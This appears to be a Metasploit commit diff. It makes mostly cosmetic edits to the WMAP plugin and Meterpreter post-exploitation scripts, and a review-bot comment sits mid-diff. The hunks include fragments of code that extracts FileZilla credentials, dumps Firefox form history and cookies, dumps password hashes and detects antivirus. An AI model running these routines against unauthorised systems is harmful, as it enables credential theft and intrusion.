mod.datastore['TYPES'] = typestr - - + + # # TODO: Add method, headers, etc. # if wtype == :WMAP_QUERY - puts "Module #{xref[4]}" + print_status "Module #{xref[4]}" # To run check function for modules that are exploits if mod.respond_to?("check") and wmap_check @@ -1087,16 +1087,16 @@ class Plugin::Wmap < Msf::Plugin print_status(" >> Exception from #{xref[4]}: #{$!}") end end - + # # Handle modules that need to be after all tests, once. # Good place to have modules that analize the test results and/or # launch exploits. # :WMAP_GENERIC # - puts "\n=[ General testing ]=" - puts "=" * sizeline - + print_status "\n=[ General testing ]=" + print_status "=" * sizeline + idx = 0 matches10.each_key do |xref| idx += 1 
@@ -1146,7 +1146,7 @@ class Plugin::Wmap < Msf::Plugin wtype = mod.wmap_type if wtype == :WMAP_GENERIC - puts "Module #{xref[4]}" + print_status "Module #{xref[4]}" # To run check function for modules that are exploits if mod.respond_to?("check") and wmap_check @@ -1159,7 +1159,7 @@ class Plugin::Wmap < Msf::Plugin print_status(" >> Exception during check launch from #{xref[4]}: #{$!}") end else - + begin session = mod.run_simple( 'LocalInput' => driver.input, @@ -1180,22 +1180,22 @@ class Plugin::Wmap < Msf::Plugin if (mode & wmap_show != 0) print_status("Analysis completed in #{(Time.now.to_f - stamp)} seconds.") print_status("Done.") - puts "+" * sizeline - puts "\n" + print_status "+" * sizeline + print_status "\n" end end # EOM - end - + end + def view_targets if self.targets == nil or self.targets.keys.length == 0 print_status "No targets have been defined" return end - + indent = ' ' - + tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, 'Header' => 'Defined targets', @@ -1213,12 +1213,12 @@ class Plugin::Wmap < Msf::Plugin tbl << [ idx.to_s, t[1][:vhost], t[1][:host], t[1][:port], t[1][:ssl], t[1][:path].to_s ] } - puts tbl.to_s + "\n" + print_status tbl.to_s + "\n" end - + def view_sites indent = ' ' - + tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, 'Header' => 'Available sites', @@ -1232,11 +1232,11 @@ class Plugin::Wmap < Msf::Plugin '# Forms', ]) - idx = 0 + idx = 0 self.framework.db.hosts.each do |bdhost| bdhost.services.each do |serv| serv.web_sites.each do |web| - c = web.web_pages.count + c = web.web_pages.count f = web.web_forms.count tbl << [ idx.to_s, bdhost.address, web.vhost, serv.port, c.to_s, f.to_s ] idx += 1 
@@ -1244,23 +1244,23 @@ class Plugin::Wmap < Msf::Plugin end end - puts tbl.to_s + "\n" + print_status tbl.to_s + "\n" end - - + + # Reusing code from hdmoore # # Allow the URL to be supplied as VHOST,URL if a custom VHOST # should be used. This allows for things like: # localhost,http://192.168.0.2/admin/ - + def add_web_site(url) - - - + + + vhost = nil - + # Allow the URL to be supplied as VHOST,URL if a custom VHOST # should be used. This allows for things like: # localhost,http://192.168.0.2/admin/ @@ -1281,24 +1281,24 @@ class Plugin::Wmap < Msf::Plugin uri = URI.parse(url) rescue nil if not uri print_error("Could not understand URL: #{url}") - return + return end if uri.scheme !~ /^https?/ print_error("Only http and https URLs are accepted: #{url}") return end - + ssl = false if uri.scheme == 'https' ssl = true end - + site = self.framework.db.report_web_site(:wait => true, :host => uri.host, :port => uri.port, :vhost => vhost, :ssl => ssl) return site end - + # Code by hdm. Modified two lines by et # def process_urls(urlstr) @@ -1309,7 +1309,7 @@ class Plugin::Wmap < Msf::Plugin urls.each do |url| next if url.to_s.strip.empty? vhost = nil - + # Allow the URL to be supplied as VHOST,URL if a custom VHOST # should be used. This allows for things like: # localhost,http://192.168.0.2/admin/ @@ -1345,10 +1345,10 @@ class Plugin::Wmap < Msf::Plugin return if target_whitelist.length == 0 self.targets = {} - + target_whitelist.each do |ent| vhost,target = ent - + host = self.framework.db.workspace.hosts.find_by_address(target.host) if not host print_error("No matching host for #{target.host}") 
@@ -1359,16 +1359,16 @@ class Plugin::Wmap < Msf::Plugin print_error("No matching service for #{target.host}:#{target.port}") next end - - #puts "aaa" - #puts framework.db.workspace.name - + + #print_status "aaa" + #print_status framework.db.workspace.name + #sites = serv.web_sites.find(:all, :conditions => ['vhost = ? or vhost = ?', vhost, host.address]) - + sites = serv.web_sites.find(:all) - + sites.each do |site| - + #site.web_forms.find_all_by_path(target.path).each do |form| ckey = [ site.vhost, host.address, serv.port, target.path].join("|") if not self.targets[ckey] @@ -1389,23 +1389,23 @@ class Plugin::Wmap < Msf::Plugin end end end - + def view_site_tree(urlstr, md, ld) - + site_whitelist = [] urls = urlstr.to_s.split(/\s+/) urls.each do |url| next if url.to_s.strip.empty? vhost = nil - + # Allow the URL to be supplied as VHOST,URL if a custom VHOST # should be used. This allows for things like: # localhost,http://192.168.0.2/admin/ if url !~ /^http/ vhost,url = url.split(",", 2) - + if url.to_s.empty? url = vhost vhost = nil @@ -1435,10 +1435,10 @@ class Plugin::Wmap < Msf::Plugin return if site_whitelist.length == 0 vsites = {} - + site_whitelist.each do |ent| vhost,target = ent - + host = self.framework.db.workspace.hosts.find_by_address(target.host) if not host print_error("No matching host for #{target.host}") @@ -1449,14 +1449,14 @@ class Plugin::Wmap < Msf::Plugin print_error("No matching service for #{target.host}:#{target.port}") next end - - #puts "aaa" - #puts framework.db.workspace.name - + + #print_status "aaa" + #print_status framework.db.workspace.name + sites = serv.web_sites.find(:all, :conditions => ['vhost = ? or vhost = ?', vhost, host.address]) - + #sites = serv.web_sites.find(:all) - + sites.each do |site| #site.vhost #site.web_forms.find_all_by_path(target.path).each do |form| 
@@ -1466,18 +1466,18 @@ class Plugin::Wmap < Msf::Plugin end end end - + # # Load website structure into a tree # def load_tree(s) - + pathchr = '/' - + wtree = Tree.new(s.vhost) - # Load site pages + # Load site pages s.web_pages.find(:all, :order => 'path').each do |req| tarray = req.path.to_s.split(pathchr) tarray.delete("") @@ -1487,7 +1487,7 @@ class Plugin::Wmap < Msf::Plugin tpath = tpath + Pathname.new(df.to_s) end end - + # Load site forms s.web_forms.each do |req| tarray = req.path.to_s.split(pathchr) @@ -1498,42 +1498,42 @@ class Plugin::Wmap < Msf::Plugin tpath = tpath + Pathname.new(df.to_s) end end - + return wtree end # # Print Tree structure. Still ugly # - + def print_tree(tree, maxlevel, limitlevel) initab = " " * 4 indent = 6 if tree != nil and tree.depth <= maxlevel print initab + (" " * indent * tree.depth) if tree.depth > 0 - print "|"+("-" * (indent-1))+"/" + print "|"+("-" * (indent-1))+"/" end - if tree.depth >= 0 + if tree.depth >= 0 if tree.depth == 0 - print "[#{tree.name}]\n"+initab+(" " * indent)+"|\n" - + print "[#{tree.name}]\n"+initab+(" " * indent)+"|\n" + else c = tree.children.count if c > 0 print tree.name + " (" + c.to_s+")\n" else print tree.name + "\n" - end + end end end - + tree.children.each_pair do |name,child| print_tree(child,maxlevel,limitlevel) end end end - + #def print_tree(tree) # if tree.is_leaf? and tree.depth > 0 @@ -1545,7 +1545,7 @@ class Plugin::Wmap < Msf::Plugin # print_tree(child) # end #end - + end class WebTarget < ::Hash @@ -1554,10 +1554,10 @@ class Plugin::Wmap < Msf::Plugin "#{proto}://#{self[:host]}:#{self[:port]}#{self[:path]}" end end - + def initialize(framework, opts) super - + wmapversion = '1.0' wmapbanner = "[WMAP #{wmapversion}] === et [ ] metasploit.com 2011" diff --git a/plugins/xmlrpc.rb b/plugins/xmlrpc.rb index 999a0afa0e..52518cb899 100644 --- a/plugins/xmlrpc.rb +++ b/plugins/xmlrpc.rb 
@@ -138,7 +138,7 @@ class Plugin::XMLRPC < Msf::Plugin self.server.add_handler(::XMLRPC::iPIMethods("plugin"), ::Msf::RPC::Plugin.new(*args) ) - + # Set the default/catch-all handler self.server.set_default_handler do |name, *args| raise ::XMLRPC::FaultException.new(-99, "Method #{name} missing or wrong number of parameters!") diff --git a/scripts/meterpreter/arp_scanner.rb b/scripts/meterpreter/arp_scanner.rb index fbcda589e0..cab09e016e 100644 --- a/scripts/meterpreter/arp_scanner.rb +++ b/scripts/meterpreter/arp_scanner.rb @@ -25,6 +25,7 @@ def enum_int end end + def arp_scan(cidr) print_status("ARP Scanning #{cidr}") ws = client.railgun.ws2_32 @@ -42,27 +43,20 @@ def arp_scan(cidr) end iplst.each do |ip_text| if i < 10 - a.push(::Thread.new { + a.push(::Thread.new { h = ws.inet_addr(ip_text) ip = h["return"] h = iphlp.SendARP(ip,0,6,6) if h["return"] == client.railgun.const("NO_ERROR") - mac = h["pMacAddr"] - print_status("IP: #{ip_text} MAC " + - mac[0].ord.to_s(16) + ":" + - mac[1].ord.to_s(16) + ":" + - mac[2].ord.to_s(16) + ":" + - mac[3].ord.to_s(16) + ":" + - mac[4].ord.to_s(16) + ":" + - mac[5].ord.to_s(16) - ) + mac_text = h["pMacAddr"].unpack('C*').map { |e| "%02x" % e }.join(':') + print_status("IP: #{ip_text} MAC #{mac_text}") found << "#{ip_text}\n" end }) - i += 1 + i += 1 else - sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? - i = 0 + sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? + i = 0 end end a.delete_if {|x| not x.alive?} while not a.empty? @@ -118,4 +112,4 @@ if client.platform =~ /win32|win64/ else print_error("This version of Meterpreter is not supported with this Script!") raise Rex::Script::Completed -end \ No newline at end of file +end diff --git a/scripts/meterpreter/autoroute.rb b/scripts/meterpreter/autoroute.rb index 55aaaecaad..8fa695edd7 100644 --- a/scripts/meterpreter/autoroute.rb +++ b/scripts/meterpreter/autoroute.rb 
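Review bot: `h["pMacAddr"].unpack('C*')` formats every byte of the buffer railgun returns, whereas the removed lines formatted exactly six; if that buffer is ever longer than six bytes (its size looks to be the `6` passed to `SendARP`, but that cannot be confirmed from the hunk) the new line prints extra octets. `unpack('C6')` pins the output to the six MAC bytes while keeping the `%02x` zero-padding that the old `to_s(16)` lacked. `arp_scan` continues outside the hunk.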
@@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Meterpreter script for setting up a route from within a diff --git a/scripts/meterpreter/checkvm.rb b/scripts/meterpreter/checkvm.rb index 1c2373636c..8f5b68c8cb 100644 --- a/scripts/meterpreter/checkvm.rb +++ b/scripts/meterpreter/checkvm.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # Meterpreter script for detecting if target host is a Virtual Machine # Provided by Carlos Perez at carlos_perez[at]darkoperator.com # Version: 0.2.0 
@@ -20,37 +21,38 @@ session = client # Function for detecting if it is a Hyper-V VM def hypervchk(session) - begin - vm = false - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ) - sfmsvals = key.enum_key - if sfmsvals.include?("Hyper-V") - print_status("This is a Hyper-V Virtual Machine") - vm = true - elsif sfmsvals.include?("VirtualMachine") - print_status("This is a Hyper-V Virtual Machine") - vm = true - end - key.close - rescue - end - if not vm - begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) - srvvals = key.enum_key - if srvvals.include?("vmicheartbeat") + begin + vm = false + key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft', KEY_READ) + sfmsvals = key.enum_key + if sfmsvals.include?("Hyper-V") print_status("This is a Hyper-V Virtual Machine") vm = true - elsif srvvals.include?("vmicvss") - print_status("This is a Hyper-V Virtual Machine") - vm = true - elsif srvvals.include?("vmicshutdown") - print_status("This is a Hyper-V Virtual Machine") - vm = true - elsif srvvals.include?("vmicexchange") + elsif sfmsvals.include?("VirtualMachine") print_status("This is a Hyper-V Virtual Machine") vm = true end + key.close + rescue + end + + if not vm + begin + key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet001\Services', KEY_READ) + srvvals = key.enum_key + if srvvals.include?("vmicheartbeat") + print_status("This is a Hyper-V Virtual Machine") + vm = true + elsif srvvals.include?("vmicvss") + print_status("This is a Hyper-V Virtual Machine") + vm = true + elsif srvvals.include?("vmicshutdown") + print_status("This is a Hyper-V Virtual Machine") + vm = true + elsif srvvals.include?("vmicexchange") + print_status("This is a Hyper-V Virtual Machine") + vm = true + end rescue end end 
@@ -81,11 +83,11 @@ def vmwarechk(session) end if not vm begin - key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0') - if key.query_value('Identifier').data.downcase =~ /vmware/ - print_status("This is a VMware Virtual Machine") - vm = true - end + key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0') + if key.query_value('Identifier').data.downcase =~ /vmware/ + print_status("This is a VMware Virtual Machine") + vm = true + end rescue end end diff --git a/scripts/meterpreter/credcollect.rb b/scripts/meterpreter/credcollect.rb index 5752aafb12..5cf971a954 100644 --- a/scripts/meterpreter/credcollect.rb +++ b/scripts/meterpreter/credcollect.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # credcollect - tebo[at]attackresearch.com opts = Rex::Parser::Arguments.new( diff --git a/scripts/meterpreter/domain_list_gen.rb b/scripts/meterpreter/domain_list_gen.rb index 8eed32031d..4ca6eaf5be 100644 --- a/scripts/meterpreter/domain_list_gen.rb +++ b/scripts/meterpreter/domain_list_gen.rb 
@@ -32,20 +32,20 @@ host = @client.sys.config.sysinfo['Computer'] current_user = @client.sys.config.getuid.scan(/\S*\\(.*)/) def reg_getvaldata(key,valname) - value = nil - begin - root_key, base_key = @client.sys.registry.splitkey(key) - open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ) - v = open_key.query_value(valname) - value = v.data - open_key.close - end - return value + value = nil + begin + root_key, base_key = @client.sys.registry.splitkey(key) + open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ) + v = open_key.query_value(valname) + value = v.data + open_key.close + end + return value end domain = reg_getvaldata("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon","DefaultDomainName") -if domain == "" - print_error("domain not found") +if domain == "" + print_error("domain not found") end # Create Filename info to be appended to downloaded files diff --git a/scripts/meterpreter/duplicate.rb b/scripts/meterpreter/duplicate.rb index 0895dd44b3..fb99634e8d 100644 --- a/scripts/meterpreter/duplicate.rb +++ b/scripts/meterpreter/duplicate.rb @@ -1,9 +1,9 @@ # $Id$ # $Revision$ # Author: Scriptjunkie -# Uses a meterpreter session to spawn a new meterpreter session in a different process. +# Uses a meterpreter session to spawn a new meterpreter session in a different process. # A new process allows the session to take "risky" actions that might get the process killed by -# A/V, giving a meterpreter session to another controller, or start a keylogger on another +# A/V, giving a meterpreter session to another controller, or start a keylogger on another # process. # @@ -83,7 +83,7 @@ if client.platform =~ /win32|win64/ server = client.sys.process.open print_status("Current server process: #{server.name} (#{server.pid})") - + if ! inject exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw) print_status("Meterpreter stager executable #{exe.length} bytes long") 
diff --git a/scripts/meterpreter/enum_chrome.rb b/scripts/meterpreter/enum_chrome.rb index f988d074f9..7891bc6225 100644 --- a/scripts/meterpreter/enum_chrome.rb +++ b/scripts/meterpreter/enum_chrome.rb @@ -33,7 +33,7 @@ end opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu" ], - "-m" => [ false, "Migrate into explorer.exe"], + "-m" => [ false, "Migrate into explorer.exe"], "-f" => [ true, "Output format: j[son], y[aml], t[ext]. Defaults to json"] ) @@ -43,7 +43,7 @@ opts.parse(args) { |opt, idx, val| @migrate = true when "-f" if val =~ /^j(son)?$/ - @output_format << "json" + @output_format << "json" elsif val =~ /^y(aml)?$/ @output_format << "yaml" elsif val =~ /^t(ext)?$/ @@ -71,10 +71,10 @@ if @output_format.include?("json") require 'json' rescue LoadError print_error("JSON is not available.") - @output_format.delete("json") + @output_format.delete("json") if @output_format.empty? print_status("Falling back to raw text output.") - @output_format << "text" + @output_format << "text" end end end @@ -123,7 +123,7 @@ def write_output(file, rows) ::File.open(file + ".yml", "w") { |f| f.write(JSON.pretty_generate(rows)) } end if @output_format.include?("text") - ::File.open(file + ".txt", "w") do |f| + ::File.open(file + ".txt", "w") do |f| f.write(rows.first.keys.join("\t") + "\n") f.write(rows.map { |e| e.values.map(&:inspect).join("\t") }.join("\n")) end diff --git a/scripts/meterpreter/enum_firefox.rb b/scripts/meterpreter/enum_firefox.rb index 2900b1166c..0cc651fc97 100644 --- a/scripts/meterpreter/enum_firefox.rb +++ b/scripts/meterpreter/enum_firefox.rb @@ -1,6 +1,6 @@ # # $Id: enum_firefox.rb 9770 2010-07-10 20:00:32Z darkoperator $ -# $Revision$ +# $Revision: $ # Author: Carlos Perez at carlos_perez[at]darkoperator.com #------------------------------------------------------------------------------- ################## Variable Declarations ################## 
@@ -52,24 +52,24 @@ def frfxdmp(usrnm) cookies = [] formvals = '' searches = '' - results = '' - placesdb = @logs + ::File::Separator + usrnm + "places.sqlite" - formdb = @logs + ::File::Separator + usrnm + "formhistory.sqlite" - searchdb = @logs + ::File::Separator + usrnm + "search.sqlite" - cookiesdb = @logs + ::File::Separator + usrnm + "cookies.sqlite" + results = '' + placesdb = @logs + ::File::Separator + usrnm + "places.sqlite" + formdb = @logs + ::File::Separator + usrnm + "formhistory.sqlite" + searchdb = @logs + ::File::Separator + usrnm + "search.sqlite" + cookiesdb = @logs + ::File::Separator + usrnm + "cookies.sqlite" bookmarks = @logs + ::File::Separator + usrnm + "_bookmarks.txt" download_list = @logs + ::File::Separator + usrnm + "_download_list.txt" url_history = @logs + ::File::Separator + usrnm + "_history.txt" form_history = @logs + ::File::Separator + usrnm + "_form_history.txt" search_history = @logs + ::File::Separator + usrnm + "_search_history.txt" - begin + begin print_status("\tGetting Firefox Bookmarks for #{usrnm}") db = SQLite3::Database.new(placesdb) #print_status("\tProcessing #{placesdb}") db.execute('select a.url from moz_places a, moz_bookmarks b, '+ - 'moz_bookmarks_roots c where a.id=b.fk and parent=2'+ - ' and folder_id=2 and a.hidden=0')do |row| + 'moz_bookmarks_roots c where a.id=b.fk and parent=2'+ + ' and folder_id=2 and a.hidden=0') do |row| bkmrks << row end print_status("\tSaving to #{bookmarks}") @@ -77,8 +77,8 @@ def frfxdmp(usrnm) bkmrks.each do |b| file_local_write(bookmarks,"\t#{b.to_s}\n") end - else - print_status("\tIt appears that there are no bookmarks for this account") + else + print_status("\tIt appears that there are no bookmarks for this account") end rescue::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") 
@@ -87,17 +87,17 @@ def frfxdmp(usrnm) begin print_status("\tGetting list of Downloads using Firefox made by #{usrnm}") db.execute('SELECT url FROM moz_places, moz_historyvisits ' + - 'WHERE moz_places.id = moz_historyvisits.place_id '+ - 'AND visit_type = "7" ORDER by visit_date') do |row| + 'WHERE moz_places.id = moz_historyvisits.place_id '+ + 'AND visit_type = "7" ORDER by visit_date') do |row| dnldsmade << row end - print_status("\tSaving Download list to #{download_list}") + print_status("\tSaving Download list to #{download_list}") if dnldsmade.length != 0 dnldsmade.each do |d| file_local_write(download_list,"\t#{d.to_s} \n") end - else - print_status("\tIt appears that downloads where cleared for this account") + else + print_status("\tIt appears that downloads where cleared for this account") end rescue::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") @@ -106,8 +106,8 @@ def frfxdmp(usrnm) begin print_status("\tGetting Firefox URL History for #{usrnm}") db.execute('SELECT DISTINCT url FROM moz_places, moz_historyvisits ' + - 'WHERE moz_places.id = moz_historyvisits.place_id ' + - 'AND visit_type = "1" ORDER by visit_date' ) do |row| + 'WHERE moz_places.id = moz_historyvisits.place_id ' + + 'AND visit_type = "1" ORDER by visit_date' ) do |row| sitesvisited << row end print_status("\tSaving URL History to #{url_history}") @@ -115,8 +115,8 @@ def frfxdmp(usrnm) sitesvisited.each do |s| file_local_write(url_history,"\t#{s.to_s}\n") end - else - print_status("\tIt appears that Browser History has been cleared") + else + print_status("\tIt appears that Browser History has been cleared") end db.close rescue::Exception => e 
@@ -130,11 +130,11 @@ def frfxdmp(usrnm) db.execute("SELECT fieldname,value FROM moz_formhistory") do |row| formvals << "\tField: #{row[0]} Value: #{row[1]}\n" end - print_status("\tSaving Firefox Form History to #{form_history}") + print_status("\tSaving Firefox Form History to #{form_history}") if formvals.length != 0 file_local_write(form_history,formvals) - else - print_status("\tIt appears that Form History has been cleared") + else + print_status("\tIt appears that Form History has been cleared") end db.close rescue::Exception => e @@ -148,11 +148,11 @@ def frfxdmp(usrnm) db.execute("SELECT name,value FROM engine_data") do |row| searches << "\tField: #{row[0]} Value: #{row[1]}\n" end - print_status("\tSaving Firefox Search History to #{search_history}") + print_status("\tSaving Firefox Search History to #{search_history}") if searches.length != 0 file_local_write(search_history,searches) - else - print_status("\tIt appears that Search History has been cleared") + else + print_status("\tIt appears that Search History has been cleared") end db.close rescue::Exception => e @@ -176,7 +176,7 @@ def frfxdmp(usrnm) fd.puts "isHttpOnly: " + item[8].to_s + "\n" fd.close end - return results + return results end #------------------------------------------------------------------------------- #Function for getting password files diff --git a/scripts/meterpreter/enum_powershell_env.rb b/scripts/meterpreter/enum_powershell_env.rb index 0e516325ae..5ff53f199c 100644 --- a/scripts/meterpreter/enum_powershell_env.rb +++ b/scripts/meterpreter/enum_powershell_env.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision: $ #Meterpreter script for enumerating Microsoft Powershell settings. #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com @client = client diff --git a/scripts/meterpreter/enum_putty.rb b/scripts/meterpreter/enum_putty.rb index d0c89614bc..76e7994e63 100644 --- a/scripts/meterpreter/enum_putty.rb +++ b/scripts/meterpreter/enum_putty.rb 
@@ -1,4 +1,5 @@ # $Id$ +# $Revision: $ # # Meterpreter script for enumerating putty connections # Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com diff --git a/scripts/meterpreter/enum_vmware.rb b/scripts/meterpreter/enum_vmware.rb index ceeeae8bcb..9fef542251 100644 --- a/scripts/meterpreter/enum_vmware.rb +++ b/scripts/meterpreter/enum_vmware.rb @@ -1,5 +1,6 @@ -# $Id$ +# $Id: $ # $Revision$ + # Author: Carlos Perez at carlos_perez[at]darkoperator.com #------------------------------------------------------------------------------- ################## Variable Declarations ################## @@ -261,7 +262,7 @@ def enum_vihosupdt begin @client.fs.dir.foreach(u['userappdata']+"VIU\\hosts\\") do |vmdir| next if vmdir =~ /^(\.|\.\.)$/ - print_status("\t#{vmdir}") + print_status("\t#{vmdir}") end rescue end diff --git a/scripts/meterpreter/event_manager.rb b/scripts/meterpreter/event_manager.rb index ecaf97b22a..87480062ea 100644 --- a/scripts/meterpreter/event_manager.rb +++ b/scripts/meterpreter/event_manager.rb @@ -89,8 +89,7 @@ def print_log_details tbl = Rex::Ui::Text::Table.new( 'Header' => "Event Logs on System", 'Indent' => 1, - 'Columns' => - [ + 'Columns' => [ "Name", "Retention", "Maximum Size", diff --git a/scripts/meterpreter/get_application_list.rb b/scripts/meterpreter/get_application_list.rb index 6b9cdad99a..bb0cd8fdfa 100644 --- a/scripts/meterpreter/get_application_list.rb +++ b/scripts/meterpreter/get_application_list.rb @@ -1,18 +1,18 @@ # $Id$ +# $Revision: $ # Meterpreter script for listing installed applications and their version. # Provided: carlos_perez[at]darkoperator[dot]com #Options and Option Parsing opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help menu." ] + "-h" => [ false, "Help menu." ] ) def app_list tbl = Rex::Ui::Text::Table.new( 'Header' => "Installed Applications", 'Indent' => 1, - 'Columns' => - [ + 'Columns' => [ "Name", "Version" ]) 
@@ -49,13 +49,13 @@ def app_list end opts.parse(args) { |opt, idx, val| - case opt - when "-h" - print_line "Meterpreter Script for extracting a list installed applications and their version." - print_line(opts.usage) - raise Rex::Script::Completed - - end + case opt + when "-h" + print_line "Meterpreter Script for extracting a list installed applications and their version." + print_line(opts.usage) + raise Rex::Script::Completed + + end } if client.platform =~ /win32|win64/ app_list diff --git a/scripts/meterpreter/get_env.rb b/scripts/meterpreter/get_env.rb index 9c5dee59c5..ec7c8a199b 100644 --- a/scripts/meterpreter/get_env.rb +++ b/scripts/meterpreter/get_env.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision: $ #------------------------------------------------------------------------------- #Options and Option Parsing opts = Rex::Parser::Arguments.new( diff --git a/scripts/meterpreter/get_filezilla_creds.rb b/scripts/meterpreter/get_filezilla_creds.rb index 60def76d46..f8213c1ee2 100644 --- a/scripts/meterpreter/get_filezilla_creds.rb +++ b/scripts/meterpreter/get_filezilla_creds.rb @@ -1,5 +1,6 @@ ## # $Id$ +# $Revision: $ ## require "rexml/document" @@ -84,10 +85,10 @@ def extract_saved_creds(path,xml_file) print_status "\tUser: #{e.elements["User"].text}" creds << "User: #{e.elements["User"].text}" print_status "\tPassword: #{e.elements["Pass"].text}" - creds << "Password: #{e.elements["Pass"].text}" + creds << "Password: #{e.elements["Pass"].text}" elsif logon_type =~ /2|3/ - print_status "\tUser: #{e.elements["User"].text}" - creds << "User: #{e.elements["User"].text}" + print_status "\tUser: #{e.elements["User"].text}" + creds << "User: #{e.elements["User"].text}" end proto = e.elements["Protocol"].text diff --git a/scripts/meterpreter/get_local_subnets.rb b/scripts/meterpreter/get_local_subnets.rb index f52f5ee410..dec55fa353 100644 --- a/scripts/meterpreter/get_local_subnets.rb +++ b/scripts/meterpreter/get_local_subnets.rb 
@@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # Meterpreter script that display local subnets # Provided by Nicob @@ -22,9 +23,9 @@ end } client.net.config.each_route { |route| - # Remove multicast and loopback interfaces - next if route.subnet =~ /^(224\.|127\.)/ - next if route.subnet == '0.0.0.0' - next if route.netmask == '255.255.255.255' - print_line("Local subnet: #{route.subnet}/#{route.netmask}") + # Remove multicast and loopback interfaces + next if route.subnet =~ /^(224\.|127\.)/ + next if route.subnet == '0.0.0.0' + next if route.netmask == '255.255.255.255' + print_line("Local subnet: #{route.subnet}/#{route.netmask}") } diff --git a/scripts/meterpreter/get_valid_community.rb b/scripts/meterpreter/get_valid_community.rb old mode 100755 new mode 100644 index 76c6112074..b08df8b9de --- a/scripts/meterpreter/get_valid_community.rb +++ b/scripts/meterpreter/get_valid_community.rb @@ -1,3 +1,6 @@ +# $Id$ +# $Revision$ + #copied getvncpw - thanks grutz/carlos session = client diff --git a/scripts/meterpreter/getcountermeasure.rb b/scripts/meterpreter/getcountermeasure.rb index e0406f1b12..ce0ad27824 100644 --- a/scripts/meterpreter/getcountermeasure.rb +++ b/scripts/meterpreter/getcountermeasure.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Meterpreter script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration. # Provides also the option to kill the processes of detected products and disable the built-in firewall. @@ -111,9 +112,9 @@ avs = %W{ defwatch.exe f-agnt95.exe fpavupdm.exe - f-prot95.exe - f-prot.exe - fprot.exe + f-prot95.exe + f-prot.exe + fprot.exe fsaua.exe fsav32.exe f-sched.exe @@ -121,7 +122,7 @@ avs = %W{ fsm32.exe fsma32.exe fssm32.exe - f-stopw.exe + f-stopw.exe f-stopw.exe fwservice.exe fwsrv.exe diff --git a/scripts/meterpreter/gettelnet.rb b/scripts/meterpreter/gettelnet.rb index 009fd967f5..a65c4120d0 100644 --- a/scripts/meterpreter/gettelnet.rb +++ b/scripts/meterpreter/gettelnet.rb 
@@ -40,7 +40,7 @@ end def insttlntsrv() trgtos = @client.sys.config.sysinfo['OS'] if trgtos =~ /Vista|7|2008/ - puts("Checking if Telnet Service is Installed") + print_status("Checking if Telnet Service is Installed") if checkifinst() print_status("Telnet Service Installed on Target") else @@ -52,7 +52,7 @@ def insttlntsrv() @client.sys.process.get_processes().each do |x| found =1 if prog2check == (x['name'].downcase) - puts "*" + print_line "*" sleep(0.5) found = 0 end diff --git a/scripts/meterpreter/hashdump.rb b/scripts/meterpreter/hashdump.rb index 920630c2e5..5b88c13f4e 100644 --- a/scripts/meterpreter/hashdump.rb +++ b/scripts/meterpreter/hashdump.rb @@ -1,4 +1,5 @@ # $Id$ +# $Revision$ # # Implement pwdump (hashdump) through registry reads + syskey 
@@ -30,22 +31,22 @@ opts.parse(args) { |opt, idx, val| @sam_empty_nt = ["31d6cfe0d16ae931b73c59d7e0c089c0"].pack("H*") @des_odd_parity = [ - 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, - 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31, - 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, - 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62, - 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79, - 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94, - 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110, - 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127, - 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143, - 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158, - 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174, - 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191, - 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206, - 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223, - 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239, - 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254 + 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, + 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31, + 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 